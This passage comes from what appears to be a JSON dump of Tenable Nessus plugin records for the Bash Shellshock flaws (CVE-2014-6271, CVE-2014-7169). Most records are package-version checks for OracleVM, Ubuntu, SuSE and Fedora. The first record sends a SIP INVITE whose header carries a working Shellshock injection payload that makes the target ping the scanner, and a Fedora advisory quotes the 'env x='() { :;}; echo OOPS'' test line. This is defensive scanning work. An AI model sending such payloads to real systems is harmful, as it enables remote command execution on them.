script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"SIP Script Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SIP server uses scripts that allow remote command execution\nvia Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running SIP. SIP itself is not\nvulnerable to Shellshock; however, any Bash script that SIP runs for\nfiltering or other routing tasks could potentially be affected if the\nscript exports an environmental variable from the content or headers\nof a SIP message.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that any scripts\nthe SIP proxy may be running do not create the conditions that are\nexploitable via the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch or remove the affected SIP scripts /\nmodules.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sip_detection.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/sip\", 5060);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc:\"sip\", ipproto:\"udp\", default:5060, exit_on_fail:1);\n\n# Open connection to SIP.\nsoc = open_sock_udp(port);\n\nif (!soc) audit(AUDIT_SOCK_FAIL,\"SIP\",port);\n\n#\n# setup unique id for pingback\n#\nid_tag = hexstr(rand_str(length:10));\n\n#\n# build INVITE request\n#\nraddress = get_host_ip();\nladdress = compat::this_host();\nrn = raw_string(0x0d, 0x0a);\n\ndata = \"INVITE sip:nessus@\" + raddress + \" SIP/2.0\" + rn +\n\"Via: SIP/2.0/UDP \" + laddress + \":5062;branch=z9hG4bK23000023\" + rn +\n'From: \\\"Nessus\\\" <sip:nessus@' + raddress + \">;tag=999888777\" + rn +\n\"To: <sip:@\" + raddress + \">\" + rn +\n\"Call-ID: 23@\" + laddress + rn +\n\"CSeq: 1 INVITE\" + rn +\n\"Contact: <sip:nessus@\" + laddress + \":5062>\" + rn +\n\"Content-Type: application/sdp\" + rn +\n\"Max-Forwards: 13\" + rn +\n\"User-Agent: NESSUS\" + rn +\n\"SHELLSHOCK: () { :;}; ping -c 10 -p '\" + string(id_tag) + \"' \" + laddress + rn +\n\"Content-Length: 0\" + rn + rn;\n\n#\n# send SIP INVITE\n#\n\n# See if we get a response\nfilter = \"icmp and icmp[0] = 8 and src host \" + raddress;\ns = send_capture(socket:soc, data:data, pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || id_tag >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"SIP\",port);\n\nreport = NULL;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus was able to exploit CVE-2014-6271 (Shellshock) using a specially' +\n '\\n' + 'crafted INVITE request.' +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:17", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : bash (OVMSA-2014-0022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2014-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/78238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78238);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.2 : bash (OVMSA-2014-0022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000223.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6f4b2b7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:49", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2363-2.NASL", "href": "https://www.tenable.com/plugins/nessus/77898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77898);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the\npatch for CVE-2014-7169 didn't get properly applied in the Ubuntu\n14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-2/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:09", "description": "bash has been updated to fix a critical security issue.\n\nIn some circumstances, the shell would evaluate shellcode in environment variables passed at startup time. This allowed code execution by local or remote attackers who could pass environment variables to bash scripts. (CVE-2014-6271)", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9740)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:bash", "p-cpe:/a:novell:suse_linux:11:bash-doc", "p-cpe:/a:novell:suse_linux:11:libreadline5", "p-cpe:/a:novell:suse_linux:11:libreadline5-32bit", "p-cpe:/a:novell:suse_linux:11:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_BASH-140919.NASL", "href": "https://www.tenable.com/plugins/nessus/77850", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77850);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9740)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"bash has been updated to fix a critical security issue.\n\nIn some circumstances, the shell would evaluate shellcode in\nenvironment variables passed at startup time. This allowed code\nexecution by local or remote attackers who could pass environment\nvariables to bash scripts. (CVE-2014-6271)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 9740.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-04T14:50:17", "description": "Disclosure - http://www.openwall.com/lists/oss-security/2014/09/24/10\n\nBehaviour prior to patch :\n\n$ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin OOPS This account is currently not available.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Fedora 19 : bash-4.2.47-2.fc19 (2014-11503)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11503.NASL", "href": "https://www.tenable.com/plugins/nessus/77876", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11503.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77876);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"FEDORA\", value:\"2014-11503\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 19 : bash-4.2.47-2.fc19 (2014-11503)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Disclosure - http://www.openwall.com/lists/oss-security/2014/09/24/10\n\nBehaviour prior to patch :\n\n$ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin OOPS This\naccount is currently not available.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openwall.com/lists/oss-security/2014/09/24/10\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138675.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f6f0bbc5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bash-4.2.47-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:28", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit 